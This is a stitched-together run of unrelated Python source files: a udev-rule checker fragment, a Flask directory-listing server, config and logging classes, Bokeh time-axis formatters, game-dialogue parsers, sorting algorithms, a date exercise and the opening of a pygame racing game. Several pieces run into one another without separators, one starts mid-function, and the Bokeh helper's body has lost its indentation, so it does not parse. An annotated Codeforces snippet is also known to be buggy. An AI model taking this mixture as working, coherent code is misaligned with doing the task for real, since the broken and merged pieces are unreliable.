    # 'or []' guards against enumerate_udev_files() returning None on error.
    for f in enumerate_udev_files() or []:
        name = os.path.basename(f)
        installed_udev_file = os.path.join(UDEV_RULES_DIR, name)
        if os.path.isfile(installed_udev_file):
            if os.path.realpath(installed_udev_file) != f:
                warn(name + ' exists, but is not correct')
            else:
                success(name + ' installed')
        else:
            error(name + ' not installed')
|
import os
import os.path
from flask import Flask
from flask_autoindex import AutoIndex
# NOTE(review): 'cdn' is used as a namespace, not a real class — the Flask app
# and routes are created at class-definition time.
class cdn :
    app = Flask(__name__)
    # Serve a browsable directory index rooted at the current directory.
    AutoIndex(app, browse_root=os.path.curdir)
    @app.route('/list')
    def list():
        """Return (as a stringified list) the relative paths of every file under cwd."""
        r=[]
        f=[os.path.join(dirpath, f)
              for dirpath, dirnames, files in os.walk(os.getcwd())
              for f in files]
        # NOTE(review): range(-1, len(f)-1) visits every index but starts at -1,
        # so the last file is listed first — presumably unintentional; confirm.
        for i in range(-1,len(f)-1) :
            # Strip the cwd prefix and normalise Windows separators.
            s=str(f[i]).replace(str(os.getcwd()),'')
            s=s.replace('\\','/')
            r.append(s[1:len(s)])
        return str(r)
if __name__ == '__main__':
    # Run the Flask development server on the default host/port.
    cdn.app.run()
|
def isPalindrome(self, array: List[int]) -> bool:
    """Return True iff *array* reads the same forwards and backwards."""
    left, right = 0, len(array) - 1
    # Walk the two ends toward each other; any mismatch disproves the palindrome.
    while left < right:
        if array[left] != array[right]:
            return False
        left += 1
        right -= 1
    return True
|
# -*- encoding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import io
import logging
import logging.config
import sys
from collections import OrderedDict
from armory.environ import Environment
from armory.serialize import jsonexpand, jsonify
from dateutil.parser import parse
from .comm import CommProxy
if (sys.version_info > (3, 0)):
    # FileNotFoundError is a built-in for Python 3
    pass
else:
    # Python 2 has no FileNotFoundError; alias the closest exception types so
    # 'except FileNotFoundError' works on both versions.
    FileNotFoundError = (IOError, OSError)
# Default console formatter name and root log level for the dictConfig below.
LOGGING_VERBOSITY_DEFAULT = 'levelname'
LOGGING_LEVEL_DEFAULT = 'INFO'
# logging.config.dictConfig schema; DragoniteConfig.configure mutates the
# levels/formatter entries in place before applying it.
LOGGING_CONFIG = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'simple': {
            'format': '%(message)s',
        },
        'levelname': {
            'format': '[%(levelname)s] %(message)s',
        },
        'normal': {
            'format': '[%(levelname)s] %(name)s:%(lineno)d %(message)s',
        },
        'verbose': {
            'format': (
                '[%(levelname)s] %(name)s:%(funcName)s:%(lineno)d %(message)s'
            ),
        },
    },
    'handlers': {
        # Single stdout handler shared by every logger below.
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'stream': sys.stdout,
            'formatter': LOGGING_VERBOSITY_DEFAULT,
        },
    },
    'loggers': {
        '': {
            'level': LOGGING_LEVEL_DEFAULT,
            'handlers': ['console'],
            'propagate': False,
        },
        'dragonite': {
            'level': LOGGING_LEVEL_DEFAULT,
            'handlers': ['console'],
            'propagate': False,
        },
        # Quiet the chatty third-party 'requests' logger.
        'requests': {
            'level': 'WARNING',
            'handlers': ['console'],
            'propagate': False,
        }
    },
}
class DragoniteCache(object):
    """Small key/value cache, optionally persisted to a JSON file by flush().

    On construction the cache file (default '.dragonite') is loaded if it
    exists; 'event_start'/'event_end' entries are revived into datetimes.
    """
    def __init__(self, tofile=False, cachefile=None):
        self._data = {}
        self._tofile = tofile
        self.cachefile = cachefile or '.dragonite'
        try:
            with io.open(self.cachefile, 'r', encoding='utf-8') as handle:
                raw = handle.read()
            if raw:
                self._data.update(jsonexpand(raw))
                # Date-valued entries are stored as strings; parse them back.
                for key in ('event_start', 'event_end'):
                    if key in self._data:
                        self._data[key] = parse(self._data[key])
        except FileNotFoundError:
            # No cache file yet: start empty.
            pass
    def __getitem__(self, item):
        return self._data[item]
    def __setitem__(self, item, value):
        self._data[item] = value
    def get(self, item, default=None):
        return self._data.get(item, default)
    def flush(self):
        """Write the cache to disk, but only when persistence was requested."""
        if self._tofile:
            with io.open(self.cachefile, 'w', encoding='utf-8') as handle:
                handle.write(jsonify(self._data, True))
class DragoniteConfig(object):
    """Runtime configuration for dragonite.

    A module-level singleton is created below; callers either pass options to
    the constructor (which forwards them) or call configure() explicitly.
    """
    fmt_long = '[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s'
    fmt_short = '%(message)s'
    fmt_date = '%Y-%m-%d %H:%M:%S'
    # Price ceiling used when the cache holds no 'max_price' entry.
    MAX_PRICE = 300
    def __init__(self, **options):
        if options:
            # BUG FIX: the original called self.setup(**options), a method
            # that does not exist; configure() is the real initialiser.
            self.configure(**options)
    def configure(self, **options):
        """Apply the option dict: logging, cache policy and the comm proxy."""
        self._warnings = []
        self._logconf = {}
        self.env = Environment({
            'DRAGONITE_LOGLEVEL': {'default': 'info'},
        })
        ll = options.get('loglevel', None)
        if ll is None:
            try:
                self.loglevel = self.env('DRAGONITE_LOGLEVEL').upper()
            except KeyError:
                errmsg = 'ignoring env var {0} with invalid value of {1}'
                self._warnings.append(errmsg.format('DRAGONITE_LOGLEVEL', ll))
                self.loglevel = 'INFO'
        else:
            try:
                self.loglevel = ll.upper()
            except AttributeError:
                # A non-string loglevel raises AttributeError, not the
                # KeyError the original caught (so it never handled it).
                errmsg = 'ignoring option loglevel with invalid value of {0}'
                self._warnings.append(errmsg.format(ll))
                self.loglevel = 'INFO'
        # Push the chosen level into the shared dictConfig and apply it.
        LOGGING_CONFIG['loggers']['']['level'] = self.loglevel
        LOGGING_CONFIG['loggers']['dragonite']['level'] = self.loglevel
        self.verbose = bool(options.get('verbose', False))
        if self.verbose:
            LOGGING_CONFIG['handlers']['console']['formatter'] = 'normal'
        logging.config.dictConfig(LOGGING_CONFIG)
        cc = options.get('cache', None)
        if cc is None:
            self.use_cache = False
        else:
            self.use_cache = bool(cc)
        self.interval = 1
        self.max_attempts = options.get('max_attempts', 0)
        self.debug = options.get('debug', False)
        self.info = options.get('info', True)
        self.simple = options.get('simple', False)
        self.nodb = options.get('nodb', False)
        self.comm = CommProxy(settings=self)
    @property
    def cache(self):
        # Created lazily so an unconfigured instance never touches disk.
        if not hasattr(self, '_cache'):
            self._cache = DragoniteCache(tofile=self.use_cache)
        return self._cache
    def __str__(self):
        return '{0}'.format({
            'use_cache': self.use_cache,
        })
    @property
    def sms_enabled(self):
        return self.cache.get('send_sms', False)
    @property
    def email_enabled(self):
        return self.cache.get('send_email', False)
    @property
    def max_price(self):
        return self.cache.get('max_price', self.MAX_PRICE)
    @property
    def checkin(self):
        return self.cache.get('checkin', None)
    @property
    def checkout(self):
        return self.cache.get('checkout', None)
    @property
    def use_db(self):
        return (not self.nodb)
    def dict(self):
        """Return an ordered snapshot of the effective configuration."""
        config = OrderedDict()
        config['debug'] = self.debug
        config['info'] = self.info
        config['simple'] = self.simple
        config['use_cache'] = self.use_cache
        config['use_db'] = self.use_db
        config['max_attempts'] = self.max_attempts
        config['max_price'] = self.max_price
        config['checkin'] = self.checkin
        config['checkout'] = self.checkout
        config['loglevel'] = self.loglevel
        config['verbose'] = self.verbose
        config['sms_enabled'] = self.sms_enabled
        config['email_enabled'] = self.email_enabled
        return config
    def dumps(self, pretty=False):
        return jsonify(self.dict(), pretty=pretty)
# Module-level singleton; importers share this unconfigured instance and are
# expected to call settings.configure(...) before use.
settings = DragoniteConfig()
|
# https://codeforces.com/group/XWOeQO4RLM/contest/206799/problem/G
# NOTE(review): work-in-progress solution with debug prints (111/222/333) left
# in. It mutates 'abilities' with remove() WHILE iterating it in the for loop,
# which skips elements, and abilities.index(i) finds the FIRST equal value,
# not the current position — both are classic bugs. The intended assignment
# rule is unclear from here, so the code is annotated rather than rewritten.
studens=int(input())
abilities=input()
# Keep every other character (drop the separating spaces) and parse digits.
abilities=abilities[::2]
abilities=list(abilities)
for i in range(len(abilities)):
    abilities[i]=int(abilities[i])
comands=[]
diff = 1
while abilities!=[]:
    for i in abilities:
        print(111)
        if len(comands)<4:
            comands.append(i)
            comands.append('index = '+str(abilities.index(i)+diff)+' , ')
            abilities.remove(i)
            diff+=1
            print(222)
        elif i!=comands[-2] and i!=comands[-4]:
            comands.append(i)
            comands.append('index = '+str(abilities.index(i)+diff)+' , ')
            abilities.remove(i)
            diff+=1
            print(333)
print(' comands ')
print(*comands)
from bokeh.core.properties import Override, List, String
from bokeh.models import CompositeTicker, AdaptiveTicker, TickFormatter, LinearAxis
# Globals
# Time-interval constants, all expressed in seconds.
ONE_NANO = 1e-9
ONE_MILLI = 1e-3
ONE_SECOND = 1.0
ONE_MINUTE = 60.0 * ONE_SECOND
ONE_HOUR = 60 * ONE_MINUTE
def _TIME_TICK_FORMATTER_HELP(field):
return """
Formats for displaying time values in the %s range.
See the :class:`~bokeh.models.formatters.TimeTickFormatter` help for a list of all supported formats.
""" % field
class TimeTicker(CompositeTicker):
    """ Generate nice ticks across different time scales.
    """
    __implementation__ = 'time_ticker.coffee'
    num_minor_ticks = Override(default=4)
    # Three adaptive tickers partition the time axis:
    # sub-second (decimal), seconds-to-minutes (base 60), hours (base 24).
    tickers = Override(default=lambda: [
        AdaptiveTicker(
            mantissas=[1, 2, 5],
            base=10,
            min_interval=ONE_NANO,
            max_interval=500 * ONE_MILLI,
            num_minor_ticks=5
        ),
        AdaptiveTicker(
            mantissas=[1, 2, 5, 10, 15, 20, 30],
            base=60,
            min_interval=ONE_SECOND,
            max_interval=30 * ONE_MINUTE,
            num_minor_ticks=4
        ),
        AdaptiveTicker(
            mantissas=[1, 2, 4, 6, 8, 12],
            base=24,
            min_interval=ONE_HOUR,
            max_interval=None,
            num_minor_ticks=4
        )
    ])
class TimeTickFormatter(TickFormatter):
    """ A ``TickFormatter`` for displaying time values nicely across a
    range of scales.
    ``TimeTickFormatter`` has the following properties for setting formats
    at different time scales:
    * ``nanoseconds``
    * ``micronanosec``
    * ``microseconds``
    * ``millimicrosec``
    * ``milliseconds``
    * ``secmillisec``
    * ``seconds``
    * ``minsec``
    * ``minutes``
    * ``hourmin``
    * ``hours``
    Each scale property can be set to format or list of formats to use for
    formatting time tick values that fall in in that "time scale".
    By default, only the first format string passed for each time scale
    will be used. By default, all leading zeros are stripped away from
    the formatted labels.
    """
    __implementation__ = 'time_tick_formatter.coffee'
    # Each property accepts either a list of format strings or (via .accepts)
    # a single string, which is wrapped into a one-element list.
    nanoseconds = List(
        String,
        default=['ns'],
        help=_TIME_TICK_FORMATTER_HELP("``nanoseconds``")
    ).accepts(String, lambda fmt: [fmt])
    micronanosec = List(
        String,
        default=['us'],
        help=_TIME_TICK_FORMATTER_HELP("``micronanosec`` (for combined microseconds and nanoseconds)")
    ).accepts(String, lambda fmt: [fmt])
    microseconds = List(
        String,
        default=['us'],
        help=_TIME_TICK_FORMATTER_HELP("``microseconds``")
    ).accepts(String, lambda fmt: [fmt])
    millimicrosec = List(
        String,
        default=['ms'],
        help=_TIME_TICK_FORMATTER_HELP("``millimicrosec`` (for combined milliseconds and microseconds)")
    ).accepts(String, lambda fmt: [fmt])
    milliseconds = List(
        String,
        default=['ms'],
        help=_TIME_TICK_FORMATTER_HELP("``milliseconds``")
    ).accepts(String, lambda fmt: [fmt])
    secmillisec = List(
        String,
        default=['s'],
        help=_TIME_TICK_FORMATTER_HELP("``secmillisec`` (for combined seconds and milliseconds)")
    ).accepts(String, lambda fmt: [fmt])
    seconds = List(
        String,
        default=['s'],
        help=_TIME_TICK_FORMATTER_HELP("``seconds``")
    ).accepts(String, lambda fmt: [fmt])
    minsec = List(
        String,
        default=['%Mm%Ss', ':%M:%S'],
        help=_TIME_TICK_FORMATTER_HELP("``minsec`` (for combined minutes and seconds)")
    ).accepts(String, lambda fmt: [fmt])
    minutes = List(
        String,
        default=['%Mm', ':%M'],
        help=_TIME_TICK_FORMATTER_HELP("``minutes``")
    ).accepts(String, lambda fmt: [fmt])
    hourmin = List(
        String,
        default=['%Hh%Mm', '%H:%M'],
        help=_TIME_TICK_FORMATTER_HELP("``hourmin`` (for combined hours and minutes)")
    ).accepts(String, lambda fmt: [fmt])
    hours = List(
        String,
        default=['%Hh'],
        help=_TIME_TICK_FORMATTER_HELP("``hours``")
    ).accepts(String, lambda fmt: [fmt])
class TimeAxis(LinearAxis):
    """ An LinearAxis that picks nice numbers for tick locations on a
    time scale. Configured with a ``TimeTickFormatter`` by default.
    """
    __implementation__ = 'time_axis.coffee'
    # Lambdas defer construction so each axis instance gets fresh defaults.
    ticker = Override(default=lambda: TimeTicker())
    formatter = Override(default=lambda: TimeTickFormatter())
|
from parsing.parser import *
from actions.question import *
from parsing.parse_interaction import interactable_object_name, guard_noun
def see_verb() -> Parser:
    """
    :return: a parser for words that mean 'to see'. This only consumes the parsed words.
    """
    # 'can' is optional so both "can you see" and plain "see" parse.
    can_see = maybe(word_match('can', consume=Consume.WORD_ONLY)).ignore_then(word_meaning('see', consume=Consume.WORD_ONLY))
    near = word_meaning('near', consume=Consume.WORD_ONLY)
    # match_first_letter tolerates speech-recognition misspellings of 'look'.
    look = word_spelling('look', match_first_letter=True, consume=Consume.WORD_ONLY)
    find = word_spelling('find', consume=Consume.WORD_ONLY)
    # Pick whichever alternative matched with the highest confidence.
    return strongest([can_see, near, look, find])
def inventory_question() -> Parser:
    """
    :return: a parser for asking the spy what they're holding.
    """
    what = strongest_word(['what'], make_word_parsers=[word_spelling, word_meaning])
    you = word_match('you')
    carrying = strongest_word(['hold', 'carry', 'doing'], make_word_parsers=[word_spelling, word_meaning])
    # 'what' is optional; responses are mixed, the carry-word weighted at 0.24
    # (tuning constant — presumably chosen empirically; confirm before changing).
    return maybe(what) \
          .ignore_then(you, mix) \
          .ignore_then(carrying, lambda what_r, carry_r: mix(what_r, carry_r, 0.24)) \
          .ignore_parsed(InventoryContentsQuestion())
def location_question() -> Parser:
    """
    :return: a parser for asking the spy where they are.
    """
    # First-letter matching tolerates misheard variants of 'where'.
    spelling = partial(word_spelling, match_first_letter=True)
    where = strongest_word(['where'], make_word_parsers=[spelling, word_meaning])
    # Accept both "where are you" and "where am I".
    you = strongest_word(['you', 'i'])
    return where.ignore_then(you, lambda r1, r2: mix(r1, r2, 0.1)).ignore_parsed(LocationQuestion())
def guards_question() -> Parser:
    """
    :return: a parser for asking questions about guards.
    """
    # e.g. "can you see any guards?" — a see-verb followed by a guard noun.
    return see_verb() \
          .ignore_then(guard_noun(), mix) \
          .ignore_parsed(GuardsQuestion())
def surroundings_question() -> Parser:
    """
    :return: a parser for asking questions about what the spy can see around them.
    """
    # E.g. what's can you see?
    what = strongest_word(['what'], make_word_parsers=[word_spelling, word_meaning])
    what_around = maybe(what) \
                 .ignore_then(see_verb(), combine_responses=mix)
    # E.g. what's in the room
    room = strongest_word(['room', 'corridor'], make_word_parsers=[word_spelling])
    what_in = maybe(what) \
             .ignore_then(room, combine_responses=mix)
    # Either phrasing yields the same SurroundingsQuestion action.
    return strongest([what_around, what_in]) \
          .ignore_parsed(SurroundingsQuestion())
def see_object_question() -> Parser:
    """
    :return: a parser for asking whether the spy can see a specific object.
    """
    there = strongest_word(['there', 'where']) # E.g. "are there any ... ?" or "where are the ...?"
    verb = strongest([see_verb(), there])
    # The parsed object name is carried through into the question action.
    return verb \
          .ignore_then(interactable_object_name(), mix) \
          .map_parsed(lambda obj: SeeObjectQuestion(obj))
def question() -> Parser:
    """
    :return: a parser for all the types of question.
    """
    # Try every question parser and keep the highest-confidence match.
    parsers = [
        inventory_question(),
        see_object_question(),
        location_question(),
        guards_question(),
        surroundings_question()
    ]
    return strongest(parsers)
|
from util.search_equ import search_by_token, search_by_id
from util.alter_label_text import alter_label
# IDs of equations containing the \prime token. Note "\prime" relies on \p not
# being a recognised escape, so the backslash survives literally.
data_list = search_by_token("\prime", mode=0)
#data_list2 = search_by_token("'", mode= 0)
# check if prime following "^"
def get_all_index_of_a_token(token_list, token):
    """Return every position in *token_list* where *token* occurs, in ascending order."""
    return [pos for pos, tok in enumerate(token_list) if tok == token]
def following_caret(token_list, token_index):
    """Return True when the token immediately before *token_index* is '^'.

    Fixes two defects in the original: it returned None (not False) when the
    check failed, and for token_index 0 the index -1 wrapped around and
    inspected the LAST token in the list.
    """
    if token_index <= 0:
        return False
    return token_list[token_index - 1] == "^"
# Collect the IDs of equations where at least one \prime directly follows '^'.
f = []
for i in data_list:
    tokens, labels = search_by_id(i)
    index_list = get_all_index_of_a_token(tokens, "\prime")
    for j in index_list:
        if following_caret(tokens, j):
            f.append(i)
            # One match is enough for this equation; move to the next ID.
            break
pass
|
import os
from dotenv import load_dotenv
from app import create_app
# Load environment overrides from a .env file next to this script, if present.
dotenv_path = os.path.join(os.path.dirname(__file__), '.env')
if os.path.exists(dotenv_path):
    load_dotenv(dotenv_path)
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
# These imports intentionally come after create_app(): the app/extensions must
# exist before the models and CLI helpers are loaded.
from flask_migrate import migrate, upgrade
from app import models
from tests.populate_db import populate_user_table, populate_movie_table
@app.shell_context_processor
def make_shell_context():
    """Expose the db handle and models module in 'flask shell' sessions."""
    return dict(db=models.db, models=models)
@app.cli.command()
def deploy():
    """Run migrations and seed the user and movie tables."""
    # NOTE(review): flask_migrate's migrate() *generates* migration scripts;
    # calling it during deploy (rather than just upgrade()) is unusual — confirm intent.
    migrate()
    upgrade()
    populate_user_table(app)
    populate_movie_table(app)
|
# Tiny boolean demo: with x True, the 'or' condition always takes the if-branch.
x = True
y = False
if x or y:
    print("Dio bien")
    print("fskjdgh")
else:
    print("Dio mal")
print("ok")
print("123")
|
# Built-in modules #
# Internal modules #
import illumitag
from illumitag.groups.aggregate import Collection, Aggregate
from illumitag.common.autopaths import AutoPaths
# Third party modules #
###############################################################################
class Projects(Collection):
    """A collection of projects."""
    # Behaviour inherited unchanged from Collection; exists for type clarity.
    pass
###############################################################################
class Project(Aggregate):
    """A project containing several pools possibly spanning several runs."""
    def __repr__(self): return '<%s object "%s" with %i pools>' % \
                               (self.__class__.__name__, self.name, len(self))
    @property
    def long_name(self): return self.first.project_long_name
    def __init__(self, name, pools, projs_dir):
        # Attributes #
        self.name = name
        # Aggregate machinery iterates 'children'; pools and children alias the same list.
        self.pools, self.children = pools, pools
        self.loaded = False
        # Dir #
        self.base_dir = projs_dir + self.name + '/'
        self.p = AutoPaths(self.base_dir, self.all_paths)
        # Extra #
        # Per-project metadata CSV lives under the repository's projects/ dir.
        self.meta_data_path = illumitag.repos_dir + 'projects/' + self.name + '.csv'
import random
def random_list(n, max_int=1000000):
    """Return a list of *n* random integers drawn uniformly from [0, max_int)."""
    values = []
    for _ in range(n):
        values.append(random.randrange(max_int))
    return values
# ===================== O(n^2) algorithms =====================
def bubble_sort(lst):
    """Sort *lst* in place by repeatedly swapping adjacent out-of-order pairs."""
    n = len(lst)
    for done in range(n):
        # After each pass, the largest remaining item has bubbled to the end.
        for k in range(n - done - 1):
            if lst[k] > lst[k + 1]:
                lst[k], lst[k + 1] = lst[k + 1], lst[k]
def selection_sort(lst):
    """In-place selection sort: grow a sorted prefix one minimum at a time."""
    n = len(lst)
    for front in range(n):
        # Index of the smallest remaining element (first occurrence on ties).
        smallest = min(range(front, n), key=lst.__getitem__)
        lst[front], lst[smallest] = lst[smallest], lst[front]
def insertion_sort(lst):
    """In-place insertion sort: shift larger items right, then drop each value into place."""
    for pos in range(1, len(lst)):
        value = lst[pos]
        hole = pos
        while hole > 0 and lst[hole - 1] > value:
            lst[hole] = lst[hole - 1]
            hole -= 1
        lst[hole] = value
# =================== O(N log N) algorithms ===================
def heapsort(lst):
    """In-place heapsort: build a max-heap, then repeatedly move the root to the end."""
    def _sift_down(heap, root, last):
        # Push heap[root] down until both children are smaller or it hits the end.
        while True:
            child = 2 * root + 1
            if child > last:
                return
            # Prefer the larger of the two children.
            if child + 1 <= last and heap[child] < heap[child + 1]:
                child += 1
            if heap[root] >= heap[child]:
                return
            heap[root], heap[child] = heap[child], heap[root]
            root = child
    last = len(lst) - 1
    # Heapify: sift every node down, starting from the bottom.
    for start in range(last, -1, -1):
        _sift_down(lst, start, last)
    # Extract: swap the max to the end and shrink the heap by one.
    for end in range(last, -1, -1):
        lst[end], lst[0] = lst[0], lst[end]
        _sift_down(lst, 0, end - 1)
def merge_sort(lst):
    """Recursive in-place merge sort (stable; <= keeps equal items in order)."""
    if len(lst) < 2:
        return
    half = len(lst) // 2
    lo, hi = lst[:half], lst[half:]
    merge_sort(lo)
    merge_sort(hi)
    # Merge the two sorted halves back into lst.
    out = a = b = 0
    while a < len(lo) and b < len(hi):
        if lo[a] <= hi[b]:
            lst[out] = lo[a]
            a += 1
        else:
            lst[out] = hi[b]
            b += 1
        out += 1
    # At most one of these loops runs: copy whichever half has leftovers.
    for leftover in lo[a:]:
        lst[out] = leftover
        out += 1
    for leftover in hi[b:]:
        lst[out] = leftover
        out += 1
def quicksort(lst, begin=0, end=None):
    """In-place quicksort of lst[begin:end+1] using the first element as pivot."""
    if end is None:
        end = len(lst) - 1
    if begin >= end:
        return
    # Lomuto-style partition: everything <= lst[begin] moves left of 'boundary'.
    boundary = begin
    for scan in range(begin + 1, end + 1):
        if lst[scan] <= lst[begin]:
            boundary += 1
            lst[scan], lst[boundary] = lst[boundary], lst[scan]
    # Place the pivot between the two partitions.
    lst[boundary], lst[begin] = lst[begin], lst[boundary]
    quicksort(lst, begin, boundary - 1)
    quicksort(lst, boundary + 1, end)
# lst = random_list(100, 1000)
# print(lst)
# heapsort(lst)
# print(lst)
|
# Write a Python program to get next day of a given date.
# Expected Output:
# Input a year: 2016
# Input a month [1-12]: 08
# Input a day [1-31]: 23
# The next date is [yyyy-mm-dd] 2016-8-24
import datetime

# Read and validate each component before asking for the next one.
date=int(input("enter the date:"))
if date>=1 and date<=31:
    print("now enter the month")
    month=int(input("enter the month:"))
    if month>=1 and month<=12:
        print("plz enter the year now")
        year=int(input("enter the year:"))
        if year>=1 and year<=2021:
            try:
                # datetime handles month lengths, leap years and year rollover;
                # the original printed date+1 even on the last day of a month
                # (e.g. 31/8 became "32 / 8").
                next_day = datetime.date(year, month, date) + datetime.timedelta(days=1)
                print(next_day.day,"/",next_day.month,"/",next_day.year)
            except ValueError:
                # A day that does not exist in that month, e.g. 31/02.
                print("plz enter valid date")
        else:
            print("plz enter valid year")
    else:
        print("plz enter the valid month")
else:
    print("plz enter valid date")
|
# -*- coding: utf-8 -*-
import pygame
import random
import time
from random import choice
from firebase import firebase
from tkinter import *
import sys
import tkinter as tk
# Realtime-database endpoint used for the score board.
FIREBASE_URL = "https://car-game.firebaseio.com/"
# NOTE(review): a 'global' statement at module level is a no-op; functions that
# assign 'result' would each need their own 'global result' declaration.
global result
if __name__ == '__main__':
    # Create a reference to the Firebase application
    fb = firebase.FirebaseApplication(FIREBASE_URL, None)
    # Read the score data from the database
    result = fb.get('/', "Scores")
    #nome = input("Insira o seu nome: ")
    escolha_Carro = 1 # 1 for Ferrari 2 for Mini
    produto = result
    pygame.init()
    pygame.display.set_caption('Teachers Game Race') # game name still to be decided
    framespersecond = pygame.time.Clock()
    # Colour palette (RGB tuples).
    black = (0,0,0)
    white = (255,255,255)
    blue = (0,0,255)
    green = (0,255,0)
    red = (255,0,0)
    blackb = (200,200,200)
    yellow = (255,242,0)
    grey = (69,69,69)
    # Screen dimensions in pixels.
    largura_da_tela = 800 # x axis
    altura_da_tela = 600
    smallfont = pygame.font.SysFont("comicsansms", 30)
    medfont = pygame.font.SysFont("comicsansms", 40)
    largefont = pygame.font.SysFont("comicsansms", 110)
    # NOTE(review): the display surface is bound to 'gameDisplay' here, but the
    # drawing helpers below blit to 'DisplayDoJogo', which is never defined in
    # this part of the file — presumably assigned later; confirm.
    gameDisplay = pygame.display.set_mode((largura_da_tela,altura_da_tela))
    fps = 1000
    # Sprite and background assets.
    img_mini = pygame.image.load('car8bits2.png')
    img_ferrari = pygame.image.load('ferraricar.png')
    img_delorean = pygame.image.load('delorean.png')
    img_speed = pygame.image.load('speedracer.png')
    imgcarro = img_mini
    lourenco = pygame.image.load('lor.png')
    miranda = pygame.image.load('mir.png')
    orfali = pygame.image.load('orf.png')
    fred5 = pygame.image.load('fred1.png')
    haddad = pygame.image.load('had.png')
    heloisa = pygame.image.load('helo2.png')
    vinicius = pygame.image.load('vinicius1.png')
    bala = pygame.image.load("bala.png")
    cubo = pygame.image.load("ItemBox.png")
    Mini2 = pygame.image.load('mini.png')
    Mini = pygame.image.load('mini2.png')
    Ferrari2 = pygame.image.load('Ferrari.png')
    Ferrari = pygame.image.load('Ferrari2.png')
    fundo = pygame.image.load('Fundo1.png')
    space = pygame.image.load('space.png')
    arrow = pygame.image.load('arrow.png')
    Delorean = pygame.image.load('deloreann.png')
    Delorean2 = pygame.image.load('deloreannpb.png')
    Speed = pygame.image.load('speedracerr.png')
    Speed2 = pygame.image.load('speedracerrpb.png')
    helopeq = pygame.image.load('helopeq.png')
    orfpeq = pygame.image.load('orfpeq.png')
    fredpeq = pygame.image.load('fredpeq.png')
    mirpeq = pygame.image.load('mirpeq.png')
    lorpeq = pygame.image.load('lorpeq.png')
    bruno = pygame.image.load('bruno.png')
    bruno2 = pygame.image.load('bruno2.png')
    calvin = pygame.image.load('calvin.png')
    calvin2 = pygame.image.load('calvin2.png')
    brinquedo = pygame.image.load('brinquedo.png')
    brinquedo2 = pygame.image.load('brinquedo2.png')
    garrix = pygame.image.load('garrix.png')
    garrix2 = pygame.image.load('garrix2.png')
    katy = pygame.image.load('katy.png')
    katy2 = pygame.image.load('katy2.png')
    acdc = pygame.image.load('acdc.png')
    acdc2 = pygame.image.load('acdc2.png')
    deserto = pygame.image.load('deserto.png')
    # Soundtrack options selectable in the music menu.
    virus = pygame.mixer.Sound('virus.wav')
    firework = pygame.mixer.Sound('katy.wav')
    thunder = pygame.mixer.Sound('thunderstruck.wav')
    uptown = pygame.mixer.Sound('uptown8bits.wav')
    bottle = pygame.mixer.Sound('DrinkingFromTheBottle.wav')
    faustao = pygame.mixer.Sound('faustao.wav')
    brinq = pygame.mixer.Sound('roca.wav')
    som = bruno
    # Scrolling road background scaled to twice the screen height.
    Imagem_Fundo = pygame.image.load('8bitsRoad.png')
    Imagem_Fundo = pygame.transform.scale(Imagem_Fundo,(largura_da_tela,1200))
    fundointro = pygame.transform.scale(fundo,(largura_da_tela,altura_da_tela))
    scorefinal = pygame.transform.scale(deserto,(largura_da_tela,altura_da_tela))
def cubos_contador(cont):
    """Draw the remaining-ammo ("tiros") counter just below the score."""
    fonte = pygame.font.SysFont(None, 40)
    rotulo = fonte.render("tiros: " + str(cont), True, black)
    DisplayDoJogo.blit(rotulo, (0, 28))
def func_cubos(cubosx,cubosy):
    """Draw the ammo item box at the given (x, y) position.

    NOTE(review): draws on ``gameDisplay`` while the sibling HUD helpers use
    ``DisplayDoJogo`` -- presumably both name the same surface; confirm.
    """
    gameDisplay.blit(cubo,(cubosx,cubosy))
def desvio(contar):
    """Render the current score in the top-left corner of the screen."""
    fonte = pygame.font.SysFont(None, 40)
    placar = fonte.render("Score: " + str(contar), True, green)
    DisplayDoJogo.blit(placar, (0, 0))
def text_objects(text, cor, size):
    """Render *text* in colour *cor* at one of three preset font sizes.

    :param text: string to render.
    :param cor: pygame colour.
    :param size: 'small', 'medium' or 'large' (module-level font objects).
    :return: (surface, rect) pair for blitting.
    :raises ValueError: for an unknown size.  The original fell through to
        an UnboundLocalError instead, which obscured the real mistake.
    """
    if size == 'small':
        textSurface = smallfont.render(text, True, cor)
    elif size == 'medium':
        textSurface = medfont.render(text, True, cor)
    elif size == 'large':
        textSurface = largefont.render(text, True, cor)
    else:
        raise ValueError("unknown text size: %r" % (size,))
    return textSurface, textSurface.get_rect()
def mensagem(msg, cor, y_displace=0, x_displace=0, size='small'):
    """Blit *msg* centred on the screen, offset by the given displacements."""
    superficie, caixa = text_objects(msg, cor, size)
    caixa.center = ((largura_da_tela / 2) + x_displace,
                    (altura_da_tela / 2) + y_displace)
    DisplayDoJogo.blit(superficie, caixa)
def botao(x, y, w, h, ic, ac, acao=None):
    """Draw a rectangular button and dispatch *acao* when it is clicked.

    The rectangle uses colour *ic* normally and *ac* while the mouse hovers
    over it.  A left click while hovering runs the screen-navigation action
    named by *acao* (most actions never return: the target screens loop).
    """
    mouse = pygame.mouse.get_pos()
    click = pygame.mouse.get_pressed()
    sobre = x + w > mouse[0] > x and y + h > mouse[1] > y
    if not sobre:
        pygame.draw.rect(DisplayDoJogo, ic, (x, y, w, h))
        return
    pygame.draw.rect(DisplayDoJogo, ac, (x, y, w, h))
    if click[0] != 1:
        return
    if acao == 'quit':
        pygame.quit()
        quit()
    # Navigation table: action name -> screen function.
    despacho = {
        'play': rostos,
        'ranking': rank,
        'controles': controle,
        'sim': music_select,
        'playy': music_select,
        'nao': intro,
        'back': intro,
        'mini': loop_jogo,
        'ferrari': loop_jogo,
        'delorean': loop_jogo,
        'speed': loop_jogo,
        'calvin': car_select,
        'bruno': car_select,
        'brinquedo': car_select,
        'garrix': car_select,
        'katy': car_select,
        'acdc': car_select,
        'forward': restart,
    }
    alvo = despacho.get(acao)
    if alvo is not None:
        alvo()
def intro():
    """Main-menu screen: PLAY / RANKING / CONTROLS / QUIT buttons.

    Redraws forever; navigation happens inside botao().
    """
    # Debounce so the click that opened this screen is not immediately
    # re-processed by the buttons below.
    time.sleep(0.3)
    intro = True
    while intro:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        DisplayDoJogo.blit(fundointro, (0,0))
        #pygame.draw.rect(DisplayDoJogo,white,[0,230,100,200])
        botao(310,370,190,40,black,green,acao = 'play')
        botao(310,430,190,40,black,red,acao = 'ranking')
